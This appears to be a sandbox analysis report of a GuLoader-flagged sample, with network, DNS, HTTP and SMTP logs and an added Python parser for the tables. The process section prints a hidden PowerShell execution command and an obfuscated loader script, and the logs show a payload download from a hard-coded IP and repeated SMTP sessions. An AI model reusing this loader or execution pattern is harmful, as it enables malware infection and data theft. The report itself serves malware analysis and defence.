Jan 24, 2024 09:04:28.551246881 CET  587  49714  192.185.148.49  192.168.2.8
Jan 24, 2024 09:04:28.551413059 CET  49714  587  192.168.2.8  192.185.148.49
Jan 24, 2024 09:04:28.566867113 CET  80  49708  172.96.14.41  192.168.2.8
Jan 24, 2024 09:04:28.567020893 CET  49708  80  192.168.2.8  172.96.14.41
Jan 24, 2024 09:04:28.949542999 CET  587  49714  192.185.148.49  192.168.2.8
Jan 24, 2024 09:04:28.949778080 CET  49714  587  192.168.2.8  192.185.148.49
Jan 24, 2024 09:04:29.053508043 CET  587  49714  192.185.148.49  192.168.2.8
Jan 24, 2024 09:04:29.053719044 CET  49714  587  192.168.2.8  192.185.148.49
Jan 24, 2024 09:04:29.160430908 CET  587  49714  192.185.148.49  192.168.2.8
Jan 24, 2024 09:04:29.160953045 CET  49714  587  192.168.2.8  192.185.148.49
Jan 24, 2024 09:04:29.273588896 CET  587  49714  192.185.148.49  192.168.2.8
Jan 24, 2024 09:04:29.273674011 CET  587  49714  192.185.148.49  192.168.2.8
Jan 24, 2024 09:04:29.273715019 CET  587  49714  192.185.148.49  192.168.2.8
Jan 24, 2024 09:04:29.273724079 CET  49714  587  192.168.2.8  192.185.148.49
Jan 24, 2024 09:04:29.273750067 CET  587  49714  192.185.148.49  192.168.2.8
Jan 24, 2024 09:04:29.273791075 CET  587  49714  192.185.148.49  192.168.2.8
Jan 24, 2024 09:04:29.273799896 CET  49714  587  192.168.2.8  192.185.148.49
Jan 24, 2024 09:04:29.275734901 CET  49714  587  192.168.2.8  192.185.148.49
Jan 24, 2024 09:04:29.379846096 CET  587  49714  192.185.148.49  192.168.2.8
Jan 24, 2024 09:04:29.420010090 CET  49714  587  192.168.2.8  192.185.148.49
Timestamp  |  Source Port  |  Dest Port  |  Source IP  |  Dest IP
Jan 24, 2024 09:02:39.704502106 CET  |  49920  |  53  |  192.168.2.8  |  1.1.1.1
Jan 24, 2024 09:02:39.823796034 CET  |  53  |  49920  |  1.1.1.1  |  192.168.2.8
Jan 24, 2024 09:02:41.124038935 CET  |  57462  |  53  |  192.168.2.8  |  1.1.1.1
Jan 24, 2024 09:02:41.271666050 CET  |  53  |  57462  |  1.1.1.1  |  192.168.2.8
Timestamp  |  Source IP  |  Dest IP  |  Trans ID  |  OP Code  |  Name  |  Type  |  Class  |  DNS over HTTPS
Jan 24, 2024 09:02:39.704502106 CET  |  192.168.2.8  |  1.1.1.1  |  0xba24  |  Standard query (0)  |  api.ipify.org  |  A (IP address)  |  IN (0x0001)  |  false
Jan 24, 2024 09:02:41.124038935 CET  |  192.168.2.8  |  1.1.1.1  |  0xbe61  |  Standard query (0)  |  mail.qualityaf.com  |  A (IP address)  |  IN (0x0001)  |  false
Timestamp  |  Source IP  |  Dest IP  |  Trans ID  |  Reply Code  |  Name  |  CName / Address  |  Type  |  Class  |  DNS over HTTPS
Jan 24, 2024 09:02:36.884737968 CET  |  1.1.1.1  |  192.168.2.8  |  0x9db9  |  No error (0)  |  fp2e7a.wpc.2be4.phicdn.net  |  fp2e7a.wpc.phicdn.net  |  CNAME (Canonical name)  |  IN (0x0001)  |  false
Jan 24, 2024 09:02:36.884737968 CET  |  1.1.1.1  |  192.168.2.8  |  0x9db9  |  No error (0)  |  fp2e7a.wpc.phicdn.net  |  192.229.211.108  |  A (IP address)  |  IN (0x0001)  |  false
Jan 24, 2024 09:02:39.823796034 CET  |  1.1.1.1  |  192.168.2.8  |  0xba24  |  No error (0)  |  api.ipify.org  |  api4.ipify.org  |  CNAME (Canonical name)  |  IN (0x0001)  |  false
Jan 24, 2024 09:02:39.823796034 CET  |  1.1.1.1  |  192.168.2.8  |  0xba24  |  No error (0)  |  api4.ipify.org  |  104.237.62.211  |  A (IP address)  |  IN (0x0001)  |  false
Jan 24, 2024 09:02:39.823796034 CET  |  1.1.1.1  |  192.168.2.8  |  0xba24  |  No error (0)  |  api4.ipify.org  |  173.231.16.75  |  A (IP address)  |  IN (0x0001)  |  false
Jan 24, 2024 09:02:39.823796034 CET  |  1.1.1.1  |  192.168.2.8  |  0xba24  |  No error (0)  |  api4.ipify.org  |  64.185.227.156  |  A (IP address)  |  IN (0x0001)  |  false
Jan 24, 2024 09:02:41.271666050 CET  |  1.1.1.1  |  192.168.2.8  |  0xbe61  |  No error (0)  |  mail.qualityaf.com  |  192.185.148.49  |  A (IP address)  |  IN (0x0001)  |  false
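The packet and DNS tables above come out of the report with their columns run together (for example "4970880192.168.2.8172.96.14.41" is source port 49708, destination port 80, 192.168.2.8 and 172.96.14.41), which makes them awkward to pivot on. The following Python is an added example, not part of the Joe Sandbox report or its tooling. It recovers the columns by enumerating every possible cut of the fused digit runs and keeping the one that yields valid ports and octets with the analysis host on one side of the packet using an ephemeral port, then joins the DNS A answers onto the connections so each remote endpoint is labelled with the name the sample resolved for it (or nothing, when it reached the address without a lookup). The analysis-host address 192.168.2.8 and the Windows dynamic port range 49152-65535 used as the tie-breaker are assumptions; the sample rows are a subset copied from the tables above.

```python
"""Parse the fused packet and DNS-answer rows of a sandbox report into connection
records.  Added example, not part of the Joe Sandbox report.  ANALYSIS_HOST and
EPHEMERAL are assumptions; SAMPLE_ROWS / SAMPLE_DNS are rows copied from the report."""
import re
from collections import defaultdict

ANALYSIS_HOST = "192.168.2.8"       # assumption: the sandbox VM seen in every row
EPHEMERAL = range(49152, 65536)     # assumption: Windows default dynamic port range

ROW_RE = re.compile(r"^(?P<ts>\w{3} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2}\.\d+) CET(?P<rest>\d[\d.]+)$")
# An A answer is '<name><ipv4>A (IP address)'; the TLD is alphabetic and the address
# starts with a digit, so the name/address boundary is unambiguous.
A_RE = re.compile(r"(?P<name>[a-z0-9-]+(?:\.[a-z0-9-]+)*\.[a-z]{2,})"
                  r"(?P<ip>(?:\d{1,3}\.){3}\d{1,3})A \(IP address\)")


def _num(s, hi):
    """Digit run -> int, or None if empty, zero-padded or above hi."""
    if not s or (len(s) > 1 and s[0] == "0") or int(s) > hi:
        return None
    return int(s)


def split_packet(rest):
    """Recover (sport, dport, src, dst) from '<sport><dport><srcip><dstip>'.
    Splitting on '.' leaves seven digit runs; only the first (sport + dport + first
    source octet) and the fourth (last source octet + first destination octet) are
    ambiguous.  Try every cut and demand exactly one valid, host-anchored answer."""
    d = rest.split(".")
    if len(d) != 7 or any(_num(x, 255) is None for x in (d[1], d[2], d[4], d[5], d[6])):
        raise ValueError(f"not a fused packet row: {rest!r}")
    found = set()
    for a in range(1, 6):                      # digits in the source port
        for b in range(1, 6):                  # digits in the destination port
            c = len(d[0]) - a - b              # digits left for the first source octet
            if not 1 <= c <= 3:
                continue
            sport, dport = _num(d[0][:a], 65535), _num(d[0][a:a + b], 65535)
            o1 = _num(d[0][a + b:], 255)
            if None in (sport, dport, o1) or 0 in (sport, dport):
                continue
            for k in range(1, len(d[3])):      # cut of '<src o4><dst o1>'
                o4, p1 = _num(d[3][:k], 255), _num(d[3][k:], 255)
                if o4 is None or p1 is None:
                    continue
                src, dst = f"{o1}.{d[1]}.{d[2]}.{o4}", f"{p1}.{d[4]}.{d[5]}.{d[6]}"
                host_port = sport if src == ANALYSIS_HOST else dport if dst == ANALYSIS_HOST else None
                if host_port is not None and host_port in EPHEMERAL:
                    found.add((sport, dport, src, dst))
    if len(found) != 1:
        raise ValueError(f"ambiguous or unparsable row {rest!r}: {sorted(found)}")
    return found.pop()


def parse_packets(rows):
    """Fused TCP/UDP rows -> list of dicts; lines that are not packet rows are skipped."""
    out = []
    for row in rows:
        m = ROW_RE.match(row.strip())
        if m:
            sport, dport, src, dst = split_packet(m["rest"])
            out.append({"ts": m["ts"], "sport": sport, "dport": dport, "src": src, "dst": dst})
    return out


def parse_dns_a(rows):
    """ip -> name from fused DNS-answer rows (A records only; CNAME rows do not match)."""
    return {m["ip"]: m["name"] for m in map(A_RE.search, rows) if m}


def summarize(packets, names):
    """Per remote endpoint: packet count, distinct host-side ports (one per session),
    first/last timestamp, and the resolved name or None for a hard-coded address."""
    agg = defaultdict(lambda: {"packets": 0, "sessions": set(), "first": None, "last": None})
    for p in packets:
        if p["src"] == ANALYSIS_HOST:
            key, host_port = (p["dst"], p["dport"]), p["sport"]
        else:
            key, host_port = (p["src"], p["sport"]), p["dport"]
        e = agg[key]
        e["packets"] += 1
        e["sessions"].add(host_port)
        e["first"] = e["first"] or p["ts"]    # rows are in capture order
        e["last"] = p["ts"]
    return {f"{ip}:{port}": {"name": names.get(ip), "packets": e["packets"],
                             "sessions": len(e["sessions"]), "first": e["first"], "last": e["last"]}
            for (ip, port), e in agg.items()}


# Constructed sample input: a subset of rows copied verbatim from the report's tables.
SAMPLE_ROWS = """\
Jan 24, 2024 09:02:39.396771908 CET4970880192.168.2.8172.96.14.41
Jan 24, 2024 09:02:39.396771908 CET8049708172.96.14.41192.168.2.8
Jan 24, 2024 09:02:39.704502106 CET4992053192.168.2.81.1.1.1
Jan 24, 2024 09:02:39.823796034 CET53499201.1.1.1192.168.2.8
Jan 24, 2024 09:02:39.830533028 CET49709443192.168.2.8104.237.62.211
Jan 24, 2024 09:02:39.830568075 CET44349709104.237.62.211192.168.2.8
Jan 24, 2024 09:02:41.272687912 CET49710587192.168.2.8192.185.148.49
Jan 24, 2024 09:02:41.376209021 CET58749710192.185.148.49192.168.2.8
Jan 24, 2024 09:02:43.315341949 CET49711587192.168.2.8192.185.148.49
Jan 24, 2024 09:03:09.014065981 CET4970480192.168.2.872.21.81.240
Jan 24, 2024 09:04:12.198769093 CET49713587192.168.2.8192.185.148.49
Jan 24, 2024 09:04:28.447927952 CET49714587192.168.2.8192.185.148.49
""".splitlines()
SAMPLE_DNS = [
    "Jan 24, 2024 09:02:39.823796034 CET1.1.1.1192.168.2.80xba24No error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false",
    "Jan 24, 2024 09:02:39.823796034 CET1.1.1.1192.168.2.80xba24No error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false",
    "Jan 24, 2024 09:02:41.271666050 CET1.1.1.1192.168.2.80xbe61No error (0)mail.qualityaf.com192.185.148.49A (IP address)IN (0x0001)false",
]

if __name__ == "__main__":
    for endpoint, info in summarize(parse_packets(SAMPLE_ROWS), parse_dns_a(SAMPLE_DNS)).items():
        print(endpoint, info)
```

Run over the full tables the summary shows what the raw rows obscure: four separate sessions to mail.qualityaf.com:587 from ports 49710, 49711, 49713 and 49714 within two minutes, one TLS session to api4.ipify.org:443, and two HTTP endpoints (172.96.14.41 and 72.21.81.240) for which no DNS query was captured, i.e. addresses the sample carried rather than resolved. The uniqueness check in split_packet is deliberate: a row for which two cuts survive should fail loudly rather than silently pick a port.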
                                                                • api.ipify.org
                                                                • 172.96.14.41
Session ID  |  Source IP  |  Source Port  |  Destination IP  |  Destination Port  |  PID  |  Process
0  |  192.168.2.8  |  49708  |  172.96.14.41  |  80  |  7348  |  C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp  |  Bytes transferred  |  Direction  |  Data
Jan 24, 2024 09:02:38.605853081 CET  |  171  |  OUT  |  GET /mfMeuTZ127.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: 172.96.14.41
Cache-Control: no-cache
Jan 24, 2024 09:02:38.736567974 CET  |  1286  |  IN  |  HTTP/1.1 200 OK
                                                                Content-Type: application/octet-stream
                                                                Last-Modified: Wed, 24 Jan 2024 04:36:58 GMT
                                                                Accept-Ranges: bytes
                                                                ETag: "4fb7b6f77e4eda1:0"
                                                                Server: Microsoft-IIS/8.5
                                                                Date: Wed, 24 Jan 2024 08:02:41 GMT
                                                                Content-Length: 247872


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                0 | 192.168.2.8 | 49709 | 104.237.62.211 | 443 | 7348 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                2024-01-24 08:02:40 UTC | 155 | OUT | GET / HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                    Host: api.ipify.org
                                                                    Connection: Keep-Alive
                                                                2024-01-24 08:02:40 UTC | 157 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.25.2
                                                                    Date: Wed, 24 Jan 2024 08:02:40 GMT
                                                                    Content-Type: text/plain
                                                                    Content-Length: 12
                                                                    Connection: close
                                                                    Vary: Origin
                                                                2024-01-24 08:02:40 UTC | 12 | IN | Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 37 34
                                                                    Data Ascii: 81.181.57.74


                                                                Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
                                                                Jan 24, 2024 09:02:41.778280020 CET | 587 | 49710 | 192.185.148.49 | 192.168.2.8 | 220-mikasa.websitewelcome.com ESMTP Exim 4.96.2 #2 Wed, 24 Jan 2024 02:02:41 -0600
                                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                                    220 and/or bulk e-mail.
                                                                Jan 24, 2024 09:02:41.778526068 CET | 49710 | 587 | 192.168.2.8 | 192.185.148.49 | EHLO 424505
                                                                Jan 24, 2024 09:02:41.882533073 CET | 587 | 49710 | 192.185.148.49 | 192.168.2.8 | 250-mikasa.websitewelcome.com Hello 424505 [81.181.57.74]
                                                                    250-SIZE 52428800
                                                                    250-8BITMIME
                                                                    250-PIPELINING
                                                                    250-PIPECONNECT
                                                                    250-AUTH PLAIN LOGIN
                                                                    250-STARTTLS
                                                                    250 HELP
                                                                Jan 24, 2024 09:02:41.882740974 CET | 49710 | 587 | 192.168.2.8 | 192.185.148.49 | STARTTLS
                                                                Jan 24, 2024 09:02:41.987493992 CET | 587 | 49710 | 192.185.148.49 | 192.168.2.8 | 220 TLS go ahead
                                                                Jan 24, 2024 09:02:43.975681067 CET | 587 | 49711 | 192.185.148.49 | 192.168.2.8 | 220-mikasa.websitewelcome.com ESMTP Exim 4.96.2 #2 Wed, 24 Jan 2024 02:02:43 -0600
                                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                                    220 and/or bulk e-mail.
                                                                Jan 24, 2024 09:02:43.975857019 CET | 49711 | 587 | 192.168.2.8 | 192.185.148.49 | EHLO 424505
                                                                Jan 24, 2024 09:02:44.079713106 CET | 587 | 49711 | 192.185.148.49 | 192.168.2.8 | 250-mikasa.websitewelcome.com Hello 424505 [81.181.57.74]
                                                                    250-SIZE 52428800
                                                                    250-8BITMIME
                                                                    250-PIPELINING
                                                                    250-PIPECONNECT
                                                                    250-AUTH PLAIN LOGIN
                                                                    250-STARTTLS
                                                                    250 HELP
                                                                Jan 24, 2024 09:02:44.079909086 CET | 49711 | 587 | 192.168.2.8 | 192.185.148.49 | STARTTLS
                                                                Jan 24, 2024 09:02:44.184500933 CET | 587 | 49711 | 192.185.148.49 | 192.168.2.8 | 220 TLS go ahead
                                                                Jan 24, 2024 09:04:12.742486000 CET | 587 | 49713 | 192.185.148.49 | 192.168.2.8 | 220-mikasa.websitewelcome.com ESMTP Exim 4.96.2 #2 Wed, 24 Jan 2024 02:04:12 -0600
                                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                                    220 and/or bulk e-mail.
                                                                Jan 24, 2024 09:04:12.742635012 CET | 49713 | 587 | 192.168.2.8 | 192.185.148.49 | EHLO 424505
                                                                Jan 24, 2024 09:04:12.846515894 CET | 587 | 49713 | 192.185.148.49 | 192.168.2.8 | 250-mikasa.websitewelcome.com Hello 424505 [81.181.57.74]
                                                                    250-SIZE 52428800
                                                                    250-8BITMIME
                                                                    250-PIPELINING
                                                                    250-PIPECONNECT
                                                                    250-AUTH PLAIN LOGIN
                                                                    250-STARTTLS
                                                                    250 HELP
                                                                Jan 24, 2024 09:04:12.846812963 CET | 49713 | 587 | 192.168.2.8 | 192.185.148.49 | STARTTLS
                                                                Jan 24, 2024 09:04:12.952048063 CET | 587 | 49713 | 192.185.148.49 | 192.168.2.8 | 220 TLS go ahead
                                                                Jan 24, 2024 09:04:28.949542999 CET | 587 | 49714 | 192.185.148.49 | 192.168.2.8 | 220-mikasa.websitewelcome.com ESMTP Exim 4.96.2 #2 Wed, 24 Jan 2024 02:04:28 -0600
                                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                                    220 and/or bulk e-mail.
                                                                Jan 24, 2024 09:04:28.949778080 CET | 49714 | 587 | 192.168.2.8 | 192.185.148.49 | EHLO 424505
                                                                Jan 24, 2024 09:04:29.053508043 CET | 587 | 49714 | 192.185.148.49 | 192.168.2.8 | 250-mikasa.websitewelcome.com Hello 424505 [81.181.57.74]
                                                                    250-SIZE 52428800
                                                                    250-8BITMIME
                                                                    250-PIPELINING
                                                                    250-PIPECONNECT
                                                                    250-AUTH PLAIN LOGIN
                                                                    250-STARTTLS
                                                                    250 HELP
                                                                Jan 24, 2024 09:04:29.053719044 CET | 49714 | 587 | 192.168.2.8 | 192.185.148.49 | STARTTLS
                                                                Jan 24, 2024 09:04:29.160430908 CET | 587 | 49714 | 192.185.148.49 | 192.168.2.8 | 220 TLS go ahead


                                                                Target ID:0
                                                                Start time:09:02:15
                                                                Start date:24/01/2024
                                                                Path:C:\Users\user\Desktop\PO_00290292.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Users\user\Desktop\PO_00290292.exe
                                                                Imagebase:0x400000
                                                                File size:566'744 bytes
                                                                MD5 hash:CC69508628ADE733AA8BD21A0A646514
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000000.00000002.1728501631.000000000285B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:2
                                                                Start time:09:02:18
                                                                Start date:24/01/2024
                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:powershell.exe -windowstyle hidden $derremc = Get-Content 'C:\Users\user\AppData\Local\blindsmagningen\Nonprocurement\Lection.Fle' ; powershell.exe "$derremc"
                                                                Imagebase:0xf60000
                                                                File size:433'152 bytes
                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:.Net C# or VB.NET
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:3
                                                                Start time:09:02:18
                                                                Start date:24/01/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff6ee680000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:false

                                                                Target ID:4
                                                                Start time:09:02:18
                                                                Start date:24/01/2024
                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[obfuscated PowerShell script argument omitted]
BnJeeEnxUnpAslEro Cs LiBivTreSjs T0 C2 E Ek=Ko UpPGayTixKoiNodLaeArs k4Ga Pr'Sa4ReA F3BeDFo0ScBKn0sh3Te0Gu7ef0Pl0Of0JaFGa1anA r0Gi7Ra0Un1Fr0Th0 S4AkEDu5Ar3An4RaEDe3Na5Sa3 VDFo1 A7Ce1LuDFi1LaARg0UaBAt0 J3br4 B0 S3paCSa1PaBDa0 S0Un1KaA T0Tr7Ta0Un3 P0noBLa4Je0tu2Sk7Pr0Un0Op1TiABh0GoBTe1PeCPa0Fo1Af1arE B3NuDPh0WaBTo1ThCBa1ve8Af0Ey7Ac0 UDAt0NoBZe1 MDBa4 S0om2Ud3Fl0LoFin1blCRe1KiDSt0Ae6Sk0 AF O0Dr2 T3 A3Dr5Pl4 F5Mi4Pr2Ri9Dm0ArBUd1inADe2UnAUp0 HBfi0Co2 U0DaBAf0Cr9Ua0ImFHy1BaAfl0PiBPa2Fl8Ru0Sc1Fa1DiCLd2Ep8 S1AnBUn0Lo0Es0AtDSa1FlA S0 K7Di0Or1 P0Se0Zo3CiEAm0Ud1 B0 U7Lt0Pn0 S1TiAMo0unBWa1PaCho4Ad6Ef4Re6Ch0Sl8So0 F5 S1blEOc4 oE P4NoAIn2In3 F0tuFEn0Lu0Ev0Di7Tr0UfDCo1UnBMe1KeCPr0Sp7 P1FdD R1 NA D4FoEUd4SaAca2Sp0 K0Fe1 F0Un0Bl0HyBAd1 C6Up1 BEfr0gr2Hy0 F1 S1EnD e0Tr7Ha1Di8 S0FoBYo1enDSt5SlE K5BoDSp4La7Ub4En2De4SpESp4ne6 M2 U9 u2laADe3CaAel4KrEKa2ChEUn4No6En3 S5Pa2kl7Gl0Sc0Te1 VAPo3 CESa1 SAIm1BaCRe3Ca3Li4 T7 F4EnEEp4Ho6Be3Un5Ve2Be7Fo0Be0Fr1BeARa3SpESl1EcAUn1ErC i3Sp3Va4Fo7 O4St7 T4Bi7de'ef; B&Wa(Pa`$ DSIma pw SwMeoPhrFokkoe IrLu8Pa5Pa7Bo)Mo a`$ dN IoAfn BeChxTopNolUnoBrsBaiRevRueSlsGo0Ca2In;pr`$IcLSeo WgaaoTepSea Aealdsoipoctos F7Sn Ud=Pa SlPReyFoxOmiEndDie Ps M4Ha U'sk4ElA N2Hu3Gr0Co7Ge0CoASt1DyAKo1BaEAp1foBSl0 S0Pl0 C5Fl1MoAAs1ToDBa0Je4 F1SiBLr1KrDAn1NoALi0UpBKl1SmCAf0fa7 M0 S0Ji0St9Fl4DeE V5De3Or4CoEMe4UnA A3OvDIn0CuBGa0Ch3 P0 F7Pr0 A0As0 TFKi1 AAAm0Sh7Sc0Km1Sy0Op0ko4 S0 R2gh7Un0 M0Fe1 P8Bo0La1Ch0Br5Fo0MoBCa4 L6Di5WaERe4Ha7Me'Th;Fa& V(An`$HySAcaSowStwAcoImr HkCoe HrMo8Va5 E7 L)La Fo`$PrL BoBegCoosapDya Re BdGai rcChs S7Bo;Tv`$NoLImoDjgSpoTip BacoeModVei LcunsCo7Hi Da=sp UnP IyPaxKuiBudGueFlsJa4St Po' S4UnAPo2LaBse0Bl8Fe0Rr1Sl0Ko2 B0Gl7La0Je1Sp1ReDMe0RiB w4 S0Fo2Po7 R0Rh0Bo1Ma8 E0 l1An0 K5 U0raBGa4Fl6Sp4DyAAm2Fl3St0Si7Be0FiABi1JoASh1StESe1SkBSu0Br0Er0Sk5Kl1MoA D1myDCa0Bi4Mo1SiBkr1TiDPr1SjA R0WoBAd1 NCHe0Fe7St0Ov0Ba0ce9An4Im2Ne4 UEHi5unECa4Al7Fo'It;Sa&Lo(Ka`$OrSEkaStwKrwCooJerStkVaeSprAf8 r5 S7Br) z ja`$InLHyo BgSioKupSyaBeePodPoiVacAasCh7Fe;Sp`$DeOBeuPrdEpeVem DiYnaManOx Co= F 
pafBrk Fp B Ra`$ZiSpra RwEvwMaoBirPrkSue Fr K8He5Se5 T Ma`$LoSHya GwFawFooCarTik SeInrFr8Yn5St6up;Pr`$ ALGroUngyaoOppSoa PeundSuiBucInsBl7 C un=Si FyPBoyEmxsaibadUdeVasOr4Bi ac' H4UdABo3 M9Di0Pr7Ch0 m0Se1HkASt0HvBph1UdCSa1At9 N0BaBSu0SaBGa0trAre5 UADi5OrDLy4PoEVa5Re3Sa4NoEEj4DyATt2Hy3To0WiF M0Co9Ns0 I0Me0UnBFa1 UARe0MaCRe0KnBRy0No2 C0 D9Bu0Na0Fi0Th7Pa0 R0Ex0 P9 A5LnCEf5PrARa5WoEMa0CoB A1beA l1Ou8Ch0 M7Zo1 K8Be0Ha2 U0ChBSe0HjAEn0ReBFi4Ep0Om2 G7Da0Ki0Ca1Xx8Gr0Fu1 S0ge5Hu0 DBHj4Uf6Fl5NeEso4Sp2 R4SkE A5 b8Ur5MiDRe5Ke7Me4Si2 E4AkEFa5VeETr1St6Sa5 ADCr5SiEDe5TyEKa5SlEEd4Sv2Re4PtEUn5 u8 C5LeAFo4Sp7 P'Pa;Sp& S(Ap`$SlSBeaEmwtiwAioEwrSvk SeSarsn8bi5 M7Ka)li Xi`$ TL Mo HgWooSupPraKoeKod NiRecAusHk7Le;Pe`$UkL So AgunoTopFoaIde FdEviBrcSksAk8Om a=Va rePFoy BxPai Td Ce DsBe4Fe Pr'dr4SoAGe3iaD P0An5 B1ChBDe1BlEFr1SpDKn0Ce6lu1UnAId0 F7Sa0Wh0Ma0reFco4SvEWa5Mo3 B4FoENo4GeAZa2Ud3 E0lnFSy0Pa9Me0ru0An0RoBLe1laAco0 IC R0 tBGl0 B2Pr0Wh9 K0 S0bi0Ge7Co0 S0Un0Se9He5 AC S5TaASt5KoEPo0drBhj1unAJa1Pr8Tr0Va7 A1 e8bl0Fl2 S0NiBCr0brALu0StBAr4ap0Gt2Sk7Am0 B0He1Sp8Ur0Cl1 B0Ba5Pl0ChBDa4ut6Ta5DeEOv4Sl2 h4StEDa5MaBTr5 MBPe5BaBFo5TrCUn5EnB B5CaDNe5Re9 P5Er8Tm4Li2We4ChEta5 MESt1pe6Le5KoD K5toETo5HeEPo5 DEBr4 T2Pu4 CESm5 HA K4Ov7Gr'Fh;By&Ci(St`$PiSNoaMiw HwMooKor MkNeePrrMi8 A5 S7Ke) P Al`$OpLVeoJogUnoDapFjaCheSudErifocGrsEn8St;St`$ LWEfi WnFotPleGrr Hw Ie HeBidDe4be2Wi=Ma`"""Re`$vaeAqnPovSu: BLfeOShC BASnLPaABrPfaPDiD fAUdTGaAAr\ EbNilSeiPinAld NsPrmByaSag SnFei PnUdgCre Unvl\FrNLaoGrnAnpFar Bo Fc AuBerPleBom Ce GnMatRe\sas Ga Jr BaEmwDea NkNoeOvsFre A.PrdNer Dira`"""Da; d`$chLPooPigDeoKipEtaGaeIndumiEvcGrsPo9An Il=Vo FoP CyTox SiUnd PeFosKt4De Sp'In4FlARe2 G2Ti0De1 R0 N9 S0Sm1 E1SpEin0OxF K0VeBIn0MaA P0ro7Un0ReDAn1SeDWa4 LEPa5Ko3He4 LESl3Ni5 m3FoDSa1 L7Sp1XoDDy1KoABr0PrBEm0ho3 H4Gi0Un2Ac7Sk2Re1Ka4Ul0Sk2Ad8 L0Om7Ug0Pr2Re0BuBBr3Vi3Ab5Sk4Ga5Ba4Ag3StCFd0BeBAd0UnFSk0NoA T2 UFTo0Er2 T0Sk2Me2VrCTr1 P7 S1StAPr0DeB U1SiDPa4 E6Gr4CoAAt3Te9 D0He7Pa0Im0Ki1AfAUn0PiBOv1GaCGe1Fl9 T0LaBbe0 SBBa0PhAWi5 WASy5 SCma4 
o7Ri'Wi;Pa&Br(Li`$PrSDaaDawGrwNaoHarBokMieNorPh8Ne5Gp7Ad) C Mi`$NiLBaoRagBioChpSea Pephd AiHjcbusBr9Ap;Ti`$SoDDeiRhsFll iognaLidPr0Fo Co=Ov VlPDeyMaxTeiBodVie CsMa4Hj S' O3Sc5Re3MeD R1Pe7Un1DuDTo1 FABe0 SBmo0Ko3To4Ml0Me3RaCBy1ReBKo0Hy0Gy1UlASp0No7Di0Th3Lo0DoB P4Sa0St2Et7Ko0Ph0Fj1 cARe0AfBKi1SqCBu0 R1Sp1MiE F3 DDSt0 IBFa1 RCFo1Ma8Fr0 s7Op0StDBe0HeB H1AnDco4Fa0 K2Ti3Se0 FFUd1SlC S1PaDRh0My6Sc0DrFFo0Br2fu3 S3Zi5Ta4Pa5 U4Pr2EtDOv0 O1An1MeEVa1bl7Ou4 C6 T4NeAUd2co2Ap0 T1Un0 L9Ke0Ph1 u1QuETr0 EF S0 CBMe0OpATr0Fr7Be0TaDBi1TeDDo4Tr2 l4CoE G5EnApl5 KEBl5FrCNo5JuA u4 H2As4 ME S4FlEKe4EtAPr3Sc9Ce0 T7Fe0Mo0Un1DiASu0UtBLa1MaCOp1Ch9Me0EvBFo0 VBUf0ChARe5 HAFo5TeDFn4Ru2va4TeEsu5Sk8Tr5SuD U5Br7od4To7Or'Sl;Fa&Fu(Pr`$AnSPiaOpwprwSeoTorSekSoeSprsu8 B5Po7Sk)my Di`$PaDHoiFesDolLaoAmaVodFo0Sp; B`$StP SokrsVeiTntLnisvoKmnEne ArNe=La`$SoLVaoFagChoFop MaSeeUndUniSicNosar.TmcphoBauMonGrtAf-Pr6Le3No9 H-Se4Un0bl2Po4 A;Sa`$ ADAsiBrs PlNoo TaTrdMo1Si Sv=Re InP uydixTiiAfdTaeGosGr4Sk Re'Au3Ju5ta3SkDSt1be7De1teD b1DvAOp0CrB I0Ku3 N4Ti0Ke3 lC v1KoBKi0In0Ta1PeAfu0Ov7Pl0bl3Fl0 ZBre4 F0In2Ne7Ar0pa0 A1PhAVo0WyBSp1ReCSk0In1Au1 SEDo3UnDKl0BoBOp1UdCFo1Ut8 G0of7Co0 CDSt0GeBSk1SyDRu4Os0Gt2Th3Di0krFAl1DeCRi1LaD A0 F6 S0 hFSk0No2 U3Da3Ze5Po4Bi5La4 O2TeD D0Aa1 R1JeE U1Bo7 D4Ba6Bl4EmAPa2 N2 T0Bu1 E0Ab9Pr0In1 N1meE P0 PFdr0PhB S0GlATr0 M7Fl0MoDMa1 RDRe4Vi2Fl4BoELr5Ku8Sv5InDPl5Un7 E4To5no5 HAVa5AsEJo5 ACFu5EsACh4Cy2Wh4saE S4TrA S3 